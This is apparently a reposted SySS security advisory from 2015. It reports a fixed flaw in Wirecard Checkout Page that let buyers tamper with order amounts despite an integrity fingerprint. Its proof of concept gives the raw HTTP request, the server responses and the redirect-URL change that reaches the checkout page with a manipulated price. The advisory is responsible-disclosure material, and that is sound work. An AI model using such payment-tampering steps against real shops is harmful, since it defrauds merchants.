Product: Wirecard Checkout Page
Manufacturer: Wirecard AG
Affected Version(s): 1.0
Tested Version(s): 1.0
Vulnerability Type: Improper Validation of Integrity Check Value
(CWE-354)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2015-11-03
Solution Date: 2015-11-03
Public Disclosure: 2015-11-04
CVE Reference: Not yet assigned
Author of Advisory: Martin Sturm (SySS GmbH)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
Wirecard Checkout Page is a payment page that supports different popular
payment methods that can be integrated in online shops (see product Web
site [1]).
Due to an improper validation of an integrity check value it is possible
to perform price manipulations in web shops using Wirecard Checkout
Page.
The vulnerability has already been fixed by the Wirecard AG by only
granting access to the checkout page when a valid fingerprint is
present.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
Details about an order are sent to a Wirecard server. This order data
is protected by an integrity value named "fingerprint". If the
transmitted data matches the fingerprint value, the server redirects the
user to a checkout page via a URL in the HTTP Location header in the
server response. Otherwise, if the order data is altered and the
fingerprint does not match the transmitted data, the server redirects
the user to a failure page.
Due to an improper validation of the integrity check value
"fingerprint", it is possible to access the checkout page and to
successfully complete a transaction even if the corresponding order
data was manipulated in a previous request and does not match the
actual fingerprint. The Wirecard server reports the status of a successful
transaction to the web shop of the vendor indicating that everything
was in order.
In this way, it is possible to perform price manipulations.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
The following HTTP POST request is sent to the PHP script
checkout.wirecard.com/page/
POST /page/init.php HTTP/1.1
Host: checkout.wirecard.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-
Content-Length: 1128
customerId=CUSTOMERID&
amount=AMOUNT&
currency=CURRENCY&
orderDescription=DESCRIPTION&
orderReference=REFID&
customerStatement=STATEMENT&
successUrl=SUCCESSURL&
failureUrl=FAILURL&
cancelUrl=CANCELURL&
serviceUrl=SERVICEURL&
confirmUrl=CONFIRM&
language=LANG&
displayText=TESTTEXT&
layout=desktop&
requestFingerprintOrder=
requestFingerprint=
paymentType=SOFORTUEBERWEISUNG
The transmitted data is secured by the fingerprint. Altering any of
the parameters leads to a different fingerprint to be calculated on
the receiving server. Changing the amount leads to the following
failure response:
HTTP/1.1 302 Found
Date: Mon, 02 Nov 2015 10:56:25 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: https://checkout.wirecard.com/
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close
Changing the location URL from "failureintermediate" to "select" prompts
the Wirecard server to answer with the following response:
HTTP/1.1 302 Found
Date: Mon, 02 Nov 2015 10:57:03 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: https://checkout.wirecard.com/
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close
This page allows to complete the transaction with the incorrect amount
entered earlier.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
The back end of Wirecard Checkout Page has been updated by the
manufacturer and the reported vulnerability has been fixed.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2015-11-02: Vulnerability discovered
2015-11-03: Vulnerability reported to manufacturer
2015-11-03: Patch released by manufacturer
2015-11-04: Public release of the security advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Product Web Site for Wirecard Checkout Page
https://www.wirecard.com/
[2] SySS Security Advisory SYSS-2015-061
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was found by Martin Sturm of the SySS GmbH.
E-Mail: martin.sturm@syss.de
Public Key: https://syss.de/fileadmin/
Key ID: FB58AC9B
Key Fingerprint: EB18 CA7C BB12 9EAC 571F 15AE 2BDF 75C2 FB58 AC9B
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/
Komentarų nėra:
Rašyti komentarą